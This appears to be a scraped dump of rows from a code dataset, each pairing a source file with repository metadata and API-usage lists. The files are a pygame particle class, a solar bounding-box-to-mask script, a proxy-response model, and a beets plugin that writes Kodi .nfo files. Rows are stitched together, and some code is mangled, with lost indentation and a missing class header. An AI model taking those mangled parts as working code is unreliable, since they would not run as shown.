"line_number": 55,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_n... |
8111739008 | import pygame, sys
from pygame.locals import *
class Particle(object):
    """A small colored square that moves by a fixed delta each draw call."""

    def __init__(self, X, Y, size, deltaX, deltaY, color, displaySurface):
        """Create a particle at (X, Y) with the given size, velocity,
        color and target surface."""
        self.displaySurface = displaySurface  # surface the particle is drawn on
        self.color = color                    # fill color
        self.deltaX = deltaX                  # horizontal step per draw (pixels)
        self.deltaY = deltaY                  # vertical step per draw (pixels)
        self.rectangle = pygame.Rect(X, Y, size, size)

    def draw(self):
        """Draw the particle, then advance it for the next frame."""
        pygame.draw.rect(self.displaySurface, self.color, self.rectangle)
        self.rectangle.x += self.deltaX
        self.rectangle.y += self.deltaY

    def setColor(self, color):
        """Change the particle's fill color."""
        self.color = color
{
"api_name": "pygame.Rect",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pygame.draw.rect",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "pygame.draw",
"line_number": 22,
"usage_type": "attribute"
}
] |
37369375965 | import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import cv2
"""
iterate csv boxes in /box_4096 and convert them to images
"""
# boxfiles_dir = 'data/box_4096'
# des_dir='data/allsolar_png1500_boximage'
boxfiles_dir = 'data/box_full_4096'
des_dir='data/allsolar_full_png512_boximage'
if not os.path.exists(des_dir):
os.makedirs(des_dir)
"""
read an image to get the shape
"""
# shape_img=cv2.imread("data/allsolar_png512/20120601_0000_full_0.png").shape
shape_img=cv2.imread("data/allsolar_full_png512/20120101_0000_full_0.png").shape
shape=(4096,4096)
allFileNames = os.listdir(boxfiles_dir)
allFileNames=[ filename for filename in allFileNames if filename.endswith( '.csv' ) ]
for boxfile in allFileNames:
boxdf=pd.read_csv(os.path.join(boxfiles_dir,boxfile),header=None)
rows=boxdf.iloc[:,-4:].to_numpy()
image = np.zeros((shape))
for xmin, ymin, xmax, ymax in rows:
try:
xmin, ymin, xmax, ymax=round(xmin),4096-round(ymin),round(xmax),4096-round(ymax)
except:
print("error "+ boxfile)
continue #go to next for loop
num_channels = 1 if len(image.shape) == 2 else image.shape[2]
cv2.rectangle(image, (xmin, ymin), (xmax, ymax), color=(256,) * num_channels, thickness=-10)
image=cv2.resize(image, shape_img[0:2])
cv2.imwrite(os.path.join(des_dir,boxfile.split("box")[0]+"mask.png"), image)
| dyu62/solar_share | data/box2img.py | box2img.py | py | 1,426 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.exists",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line_number... |
25978420324 | from enum import Enum
class ProxyResponseType(Enum):
    """Kind of payload a proxy response carries."""

    proxy = 'proxy'  # forward the upstream response as-is
    file = 'file'    # serve a stored file
    json = 'json'    # serve a JSON document

    def get_dict(self):
        """Return the wire representation (the enum's string value)."""
        return self.value
def __init__(self,
request,
response,
type: ProxyResponseType,
status_code: int,
headers: dict,
body: any):
self.request = request
self.response = response
self.type = type
self.status_code = status_code
self.headers = headers
self.body = body
def get_dict(self):
return {
'type': self.type.value,
'status_code': self.status_code,
'headers': self.headers,
'body': self.body,
}
| sayler8182/MockServer | app/models/models/proxy_response.py | proxy_response.py | py | 793 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "enum.Enum",
"line_number": 4,
"usage_type": "name"
}
] |
40272343197 | from __future__ import absolute_import, division, print_function
import base64
import json
import os
import time
import requests
import urllib.request
from urllib.request import Request, urlopen
from uuid import UUID
from beets import config
import beets.library
from beets.plugins import BeetsPlugin
from pathlib import Path
from lxml import etree as et
import simplejson
audio_db_key = '195010'
artist_tags = ['name', 'musicBrainzArtistID', 'sortname', 'genre', 'style',
'mood', 'born', 'formed', 'biography', 'died', 'disbanded']
album_tags = ['title', 'musicBrainzAlbumID', 'artist', 'genre', 'style',
'mood', 'theme', 'compilation', 'review', 'type', 'releasedate',
'label', 'rating', 'year']
emptyalbum = '''{"album":[{"idAlbum":"","idArtist":"","idLabel":"",
"strAlbum":"","strAlbumStripped":"","strArtist":"",
"intYearReleased":"","strStyle":"","strGenre":"","strLabel":"",
"strReleaseFormat":"","intSales":"","strAlbumThumb":"",
"strAlbumThumbBack":"","strAlbumCDart":"","strAlbumSpine":"",
"strDescriptionEN":"","strDescriptionDE":"",
"strDescriptionFR":"","strDescriptionCN":"",
"strDescriptionIT":"","strDescriptionJP":"",
"strDescriptionRU":"","strDescriptionES":"",
"strDescriptionPT":"","strDescriptionSE":"",
"strDescriptionNL":"","strDescriptionHU":"",
"strDescriptionNO":"","strDescriptionIL":"",
"strDescriptionPL":"",
"intLoved":"","intScore":"","intScoreVotes":"","strReview":" ",
"strMood":"","strTheme":"","strSpeed":"","strLocation":"",
"strMusicBrainzID":"","strMusicBrainzArtistID":"",
"strItunesID":"","strAmazonID":"","strLocked":""}]}'''
emptyartist = '''{"artists":[{"idArtist":"","strArtist":"",
"strArtistAlternate":"","strLabel":"","idLabel":"",
"intFormedYear":"","intBornYear":"","intDiedYear":"",
"strDisbanded":"","strStyle":"","strGenre":"","strMood":"",
"strWebsite":"","strFacebook":"","strTwitter":"",
"strBiographyEN":"","strBiographyDE":"","strBiographyFR":"",
"strBiographyCN":"","strBiographyIT":"","strBiographyJP":"",
"strBiographyRU":"","strBiographyES":"","strBiographyPT":"",
"strBiographySE":"","strBiographyNL":"","strBiographyHU":"",
"strBiographyNO":"","strBiographyIL":"","strBiographyPL":"",
"strGender":"","intMembers":"","strCountry":"",
"strCountryCode":"","strArtistThumb":"","strArtistLogo":"",
"strArtistFanart":"","strArtistFanart2":"",
"strArtistFanart3":"","strArtistBanner":"",
"strMusicBrainzID":"","strLastFMChart":"","strLocked":""}]}'''
audiodb_url = "http://www.theaudiodb.com/api/v1/json/"
libpath = os.path.expanduser(str(config['library']))
lib = beets.library.Library(libpath)
LINK_ALBUM = 'https://musicbrainz.org/release/{0}'
LINK_ARTIST = 'https://musicbrainz.org/artist/{0}'
LINK_TRACK = 'https://musicbrainz.org/recording/{0}'
def artist_info(albumid):
    """Collect artist information from the beets library and theaudiodb.com.

    Returns a 13-element list of strings: [artist, mb_artistid, sort_name,
    genre, style, mood, born, formed, biography, died, disbanded, thumb_url,
    fanart_url].  Missing theaudiodb.com fields become ''.  Only the first
    album matching `albumid` is considered.
    """
    for album in lib.albums(albumid):
        data = (album.albumartist, album.albumartist_sort,
                album.mb_albumartistid, album.genre, album.path)
        url = audiodb_url + "{0}/artist-mb.php?i=".format(
            audio_db_key)
        try:
            response = urllib.request.urlopen(url + data[2])
            data2 = simplejson.load(response)["artists"][0]
        except (ValueError, TypeError):
            # catch simplejson.decoder.JSONDecodeError and load emptydata
            data2 = json.loads(emptyartist)["artists"][0]
        # Build the list directly.  The original joined all fields on ';'
        # and re-split, which corrupted the result whenever a field (e.g.
        # the biography) itself contained a semicolon.
        return [
            data[0],
            data[2],
            data[1],
            data[3],
            data2["strStyle"] or '',
            data2["strMood"] or '',
            data2["intBornYear"] or '',
            data2["intFormedYear"] or '',
            data2["strBiographyEN"] or '',
            data2["intDiedYear"] or '',
            data2["strDisbanded"] or '',
            data2["strArtistThumb"] or '',
            data2["strArtistFanart"] or '',
        ]
def artist_albums(artistid):
    """Return the artist's albums as [[original_year, title], ...],
    sorted chronologically (year first, then title)."""
    releases = [[album.original_year, album.album]
                for album in lib.albums(artistid)]
    return sorted(releases)
def album_info(albumid):
    """Collect album information from the beets library and theaudiodb.com.

    Returns a 15-element list of strings: [title, mb_albumid, artist, genre,
    style, mood, theme, compilation, review, type, releasedate, label,
    rating, year, thumb_url].  Missing theaudiodb.com fields become ''.
    Only the first album matching `albumid` is considered.
    """
    for album in lib.albums(albumid):
        data = (
            album.albumartist,
            album.mb_albumartistid,
            album.mb_releasegroupid,
            album.album,
            album.genre,
            album.comp,
            album.label,
            album.albumtype,
            album.mb_albumid)
        date = album.original_year, album.original_month, album.original_day
        # ISO-ish release date with zero-padded month/day.
        rel_date = (
            "%s-%s-%s" %
            (date[0], format(
                date[1], '02'), format(
                date[2], '02')))
        url = audiodb_url + "{0}/album-mb.php?i=".format(
            config['audiodb']['key'])
        comp = 'False' if data[5] == 0 else 'True'
        try:
            response = urllib.request.urlopen(url + data[2])
            data2 = simplejson.load(response)["album"][0]
        except (ValueError, TypeError):
            # catch simplejson.decoder.JSONDecodeError and load emptydata
            data2 = json.loads(emptyalbum)["album"][0]
        # Build the list directly.  The original joined all fields on ';'
        # and re-split, which corrupted the result whenever a field (e.g.
        # the review text) itself contained a semicolon.
        return [
            data[3],
            data[8],
            data[0],
            data[4],
            data2["strStyle"] or '',
            data2["strMood"] or '',
            data2["strTheme"] or '',
            comp,
            data2["strReview"] or '',
            data[7],
            rel_date,
            data[6],
            data2["intScore"] or '',
            str(date[0]),
            data2["strAlbumThumb"] or '',
        ]
def album_tracks(albumid):
    """Return the album's tracks as [[track_no, "MM:SS", mb_trackid, title],
    ...], sorted by track number."""
    entries = []
    for item in lib.items(albumid):
        # Format the length (seconds) as minutes:seconds.
        length = time.strftime("%M:%S", time.gmtime(item.length))
        entries.append([item.track, length, item.mb_trackid, item.title])
    return sorted(entries)
def kodi_path():
    """Ask Kodi (JSON-RPC Files.GetSources) for the music library root.

    Useful for shared libraries, in order to get nfs or samba paths.
    Returns '' on any connection or parsing failure.
    """
    try:
        credentials = str.encode(
            '%s:%s' %
            (config['kodi']['user'],
             config['kodi']['pwd']))
        # Content-Type: application/json is mandatory per the Kodi
        # JSON-RPC documentation; auth is HTTP Basic.
        headers = {
            'Content-Type': 'application/json',
            'Authorization': b'Basic ' + base64.b64encode(credentials)}
        url = "http://{0}:{1}/jsonrpc".format(
            config['kodi']['host'], config['kodi']['port'])
        payload = {"jsonrpc": "2.0",
                   "method": "Files.GetSources",
                   "params": {"media": "{0}".format(
                       config['kodi']['library_name'])},
                   "id": 1}
        request = Request(url, json.dumps(payload).encode('utf-8'), headers)
        result = simplejson.load(urlopen(request))
        return result['result']['sources'][0]['file']
    except (requests.exceptions.RequestException, ValueError, TypeError):
        return ''
def album_path(albumid):
    """Return (local_album_path, kodi_library_path) for the album.

    Returns [] when the query matches no album; with multiple matches the
    last one wins (each iteration overwrites the result).
    """
    out_data = []
    for album in lib.albums(albumid):
        local = album.path.decode("utf-8")
        # Swap the local library root for Kodi's source path.
        prefix_len = len(str(config["directory"])) + 1
        out_data = local, kodi_path() + local[prefix_len:]
    return out_data
def artist_path(albumid):
    """Get artist path.

    Returns (local_artist_path, kodi_library_path); [] when no album
    matches.  When the album folder's parent is not literally named after
    the album artist, the artist folder is inferred from the configured
    beets path format instead.
    """
    out_data = []
    root = str(config['directory'])
    for album in lib.albums(albumid):
        albumpath = album.path.decode("utf-8")
        albumartist = album.albumartist
        if albumartist == os.path.basename(os.path.dirname(albumpath)):
            # Simple layout <root>/<artist>/<album>: parent dir is the artist.
            artist_path = os.path.dirname(albumpath)
            kodi_lib_path = kodi_path() + artist_path[int(len(root) + 1):]
        else:
            # Derive the artist folder from the default path format (e.g.
            # '$albumartist/$album/...'): locate the component containing
            # 'albumartist' and take the matching ancestor of the album path.
            folder = os.path.join(root, str(config['paths']['default']))
            config_items = Path(folder).parts
            folder_length = len(config_items)
            indices = [i for i,
                       s in enumerate(config_items) if 'albumartist' in s]
            # Depth of the artist component, counted from the album file.
            y = int(folder_length - indices[0])
            artistpath_items = list(Path(albumpath).parts[-y:-1])
            artist_path = os.path.join(root, *artistpath_items)
            kodi_lib_path = kodi_path() + artist_path[int(len(root) + 1):]
        out_data = artist_path, kodi_lib_path
    return out_data
def thumbs(tag, albumid):
    """Name paths where art files reside.

    For an 'artist' tag, returns [local, kodi] paths of 'artist.tbn'; for an
    'album' tag, the same for the album's stored art file.  NOTE(review):
    implicitly returns None when `tag` matches neither, or when no matching
    album has an `artpath` set -- callers iterate the result and would raise
    TypeError in that case.
    """
    if "artist" in tag:
        thumbs = []
        for a in artist_path(albumid):
            thumb = os.path.join(a, 'artist.tbn')
            thumbs.append(thumb)
        return thumbs
    if "album" in tag:
        for album in lib.albums(albumid):
            if album.artpath:
                # Reuse the filename of beets' stored album art.
                art_file = os.path.basename(album.artpath.decode('utf8'))
                thumbs = []
                for a in album_path(albumid):
                    thumb = os.path.join(a, art_file)
                    thumbs.append(thumb)
                return thumbs
def album_nfo_text(albumid, mb_albumid, mb_artistid):
    """Create MBID-URL-only .nfo text files for the album and its artist.

    Kodi accepts an .nfo containing just a MusicBrainz URL.  No artist.nfo
    is written for compilation-style artist folders.
    """
    album_nfo_file = os.path.join(album_path(albumid)[0], 'album.nfo')
    with open(album_nfo_file, 'w') as f:
        f.write(LINK_ALBUM.format(mb_albumid))
    if os.path.basename(artist_path(albumid)[0]) in ['Various Artists',
                                                     'Soundtracks',
                                                     'Compilations']:
        pass  # No artist.nfo file for compilation albums
    else:
        # Fixed filename: was misspelled 'artsist.nfo', which Kodi never
        # reads (it scans for 'artist.nfo').
        artist_nfo_file = os.path.join(artist_path(albumid)[0],
                                       'artist.nfo')
        with open(artist_nfo_file, 'w') as f:
            f.write(LINK_ARTIST.format(mb_artistid))
def album_nfo_xml(albumid):
    """Create an XML album.nfo with album information for Kodi.

    Bug fix: the original overwrote the module-level ``album_tags`` list
    with lxml elements (``album_tags[i] = et.SubElement(...)``), so every
    call after the first wrote garbage tag names.  The helpers
    ``album_info``/``album_path``/``thumbs``/``album_tracks`` are now
    called once per album instead of once per tag/row -- each call hits
    the network and/or the database.
    """
    for album in lib.albums(albumid):
        albumnfo = os.path.join(album.path.decode('utf8'), 'album.nfo')
        albumid = 'mb_albumid:' + album.mb_albumid
        info = album_info(albumid)
        paths = album_path(albumid)
        art = thumbs('album', albumid)
        tracks = album_tracks(albumid)
        root = et.Element('album')
        # One child element per tag name, filled from album_info() in order.
        for tag, value in zip(album_tags, info):
            et.SubElement(root, tag).text = value
        for p in paths:
            et.SubElement(root, 'path').text = p
        if info[14] == '':
            # No remote thumb URL: reference the local art file(s) only.
            for t in art:
                et.SubElement(root, 'thumb').text = t
        else:
            et.SubElement(root, 'thumb').text = info[14]
            for t in art:
                et.SubElement(root, 'thumb').text = t
        albumartistcredits = et.SubElement(root, 'albumArtistCredits')
        et.SubElement(albumartistcredits, 'artist').text = album.albumartist
        et.SubElement(albumartistcredits,
                      'musicBrainzArtistID').text = album.mb_albumartistid
        # Rows from album_tracks(): [track_no, "MM:SS", mb_trackid, title].
        for position, duration, mb_trackid, title in tracks:
            track = et.SubElement(root, 'track')
            et.SubElement(track, 'position').text = str(position)
            et.SubElement(track, 'title').text = title
            et.SubElement(track, 'duration').text = duration
            et.SubElement(track, 'musicBrainzTrackID').text = mb_trackid
        xml = et.tostring(
            root,
            pretty_print=True,
            xml_declaration=True,
            encoding='UTF-8',
            standalone="yes").decode()
        # Close the file handle (the original leaked an open() per album).
        with open(albumnfo, 'w+') as f:
            print(xml, file=f)
def artist_nfo_xml(albumid):
    """Create an XML artist.nfo with artist information for Kodi.

    Bug fix: the original overwrote the module-level ``artist_tags`` list
    with lxml elements, breaking every call after the first.  ``artist_info``
    and friends are now called once per album instead of once per tag --
    each ``artist_info`` call performs a network request.
    """
    for album in lib.albums(albumid):
        albumid = 'mb_albumid:' + album.mb_albumid
        artistid = 'mb_albumartistid:' + album.mb_albumartistid
        artistnfo = os.path.join(
            album.path.decode('utf8'),
            os.pardir,
            'artist.nfo')
        if album.albumartist in ['Various Artists', 'Soundtracks',
                                 'Compilations']:
            continue  # no artist.nfo for compilation-style artists
        info = artist_info(albumid)
        paths = artist_path(albumid)
        art = thumbs('artist', albumid)
        releases = artist_albums(artistid)
        root = et.Element('artist')
        # One child element per tag name, filled from artist_info() in order.
        for tag, value in zip(artist_tags, info):
            et.SubElement(root, tag).text = value
        for p in paths:
            et.SubElement(root, 'path').text = p
        if info[11] == '':
            # No remote artist thumb available.
            et.SubElement(root, 'thumb').text = ''
        else:
            # Cache the remote thumb next to the artist folder.
            thumb_location = os.path.join(
                album.path.decode('utf8'),
                os.pardir, 'artist.tbn')
            urllib.request.urlretrieve(info[11], thumb_location)
            et.SubElement(root, 'thumb').text = info[11]
            for t in art:
                et.SubElement(root, 'thumb').text = t
        et.SubElement(root, 'fanart').text = info[12]
        # Rows from artist_albums(): [original_year, title].
        for year, title in releases:
            release = et.SubElement(root, 'album')
            et.SubElement(release, 'title').text = title
            et.SubElement(release, 'year').text = str(year)
        xml = et.tostring(
            root,
            pretty_print=True,
            xml_declaration=True,
            encoding='UTF-8',
            standalone="yes").decode()
        # Close the file handle (the original leaked an open() per artist).
        with open(artistnfo, 'w+') as f:
            print(xml, file=f)
def update_kodi(host, port, user, password):
    """Send a request to the Kodi API to start an audio library scan.

    By Pauli Kettunen.  Returns the ``requests`` response object.
    """
    # Content-Type: application/json is mandatory according to the Kodi
    # jsonrpc documentation.  Id seems to be mandatory in the payload.
    return requests.post(
        "http://{0}:{1}/jsonrpc/".format(host, port),
        auth=(user, password),
        json={'jsonrpc': '2.0', 'method': 'AudioLibrary.Scan', 'id': 1},
        headers={'Content-Type': 'application/json'})
class KodiNfo(BeetsPlugin):
    """KodiNfo Plugin: writes Kodi .nfo files on import and triggers
    a Kodi library refresh when the beets database changes."""

    def __init__(self):
        """Register config defaults and beets event listeners."""
        super(KodiNfo, self).__init__()
        # Adding defaults.
        self.config['audiodb'].add({
            "key": 1})
        config['kodi'].add({
            u'host': u'localhost',
            u'port': 8080,
            u'user': u'kodi',
            u'pwd': u'kodi',
            u'nfo_format': 'xml',
            u'library_name': 'music'})
        # Keep the password out of `beet config` output.
        config['kodi']['pwd'].redact = True
        self.register_listener('album_imported', self.create_nfos)
        self.register_listener('database_change', self.listen_for_db_change)

    def create_nfos(self, lib, album):
        """Create nfos for a freshly imported album, as per choice in config."""
        try:
            # Check if MBID is valid UUID as per MB recommendations
            UUID(album.mb_albumid)
            self._log.info(u'Album ID is valid MBID...creating .nfos')
            albumid = 'mb_albumid:' + album.mb_albumid
            mb_albumid = album.mb_albumid
            mb_artistid = album.mb_albumartistid
            nfo_format = '{0}'.format(config['kodi']['nfo_format'])
            # NOTE(review): `in` is a substring test here, so any configured
            # value that is a substring of 'mbid_only_text' (e.g. 'text')
            # also selects the text format -- presumably `==` was intended.
            if nfo_format in 'mbid_only_text':
                self._log.info(u'Creating url only text format .nfo file...')
                album_nfo_text(albumid, mb_albumid, mb_artistid)
            else:
                self._log.info(u'creating XML format .nfo file...')
                album_nfo_xml(albumid)
                artist_nfo_xml(albumid)
        except ValueError:
            # UUID() raises ValueError for malformed MBIDs.
            self._log.info(u"Album ID is not valid MBID...can't create .nfos")

    def listen_for_db_change(self, lib, model):
        """Listen for beets db change and register the update."""
        self.register_listener('cli_exit', self.update)

    def update(self, lib):
        """When client exits try sending refresh request to Kodi server."""
        self._log.info(u'Updating Kodi library...')
        # Try to send update request.
        try:
            update_kodi(
                config['kodi']['host'].get(),
                config['kodi']['port'].get(),
                config['kodi']['user'].get(),
                config['kodi']['pwd'].get())
            self._log.info(u'... started.')
        except requests.exceptions.RequestException:
            self._log.warning(u'Update failed.')
| peace899/beets2kodi | beetsplug/kodinfo.py | kodinfo.py | py | 18,692 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.expanduser",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 66,
"usage_type": "attribute"
},
{
"api_name": "beets.config",
"line_number": 66,
"usage_type": "name"
},
{
"api_name": "beets.library.Library",
... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.